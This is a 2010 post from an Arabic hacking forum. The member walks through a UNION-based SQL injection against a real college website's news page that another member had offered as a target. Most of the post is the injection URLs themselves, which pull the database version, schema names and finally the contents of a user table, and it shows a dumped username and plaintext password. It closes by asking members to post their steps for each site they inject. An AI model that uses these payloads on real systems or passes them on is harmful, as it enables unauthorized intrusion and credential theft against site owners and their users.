عرض مشاركة واحدة
قديم 08-12-2010, 07:18 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
kanvi
 
الصورة الرمزية kanvi
 

 

 
إحصائية العضو





kanvi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kanvi is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Master vbspiders
[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=389%27 
بالتوفيق
تحياتي

[/align]

تم حقن الهدف: الموقع بسيط

اصدر القاعدة

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12-- 
5.0.91-community

استخرج اسم القاعدة:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572-- 
كود PHP:
trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb 
الحقنة النهائية:
كود PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user-- 
1:aoh:test2:Andy:Oh


ملاحظة بسيطة:


نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع
التوقيع

...|""""""""""""""""""""""""""""|\|_
...|<<< k4nvi
>>>|||"|""\___-
...| ________________ __ _|||_|____|)


...!(@)'(@)""""******!(@)(@)*****!(@)""

انا حابب اشترك باحد الجروبات الخاصة بغرفة الاستهداف
Email:
__0@hotmail.sg

 


التعديل الأخير تم بواسطة kanvi ; 08-12-2010 الساعة 07:20 AM.